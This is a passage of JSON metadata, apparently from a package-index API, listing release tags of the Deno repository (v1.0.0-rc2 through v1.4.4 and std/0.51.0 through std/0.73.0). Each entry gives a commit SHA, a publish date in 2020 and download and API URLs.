:null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t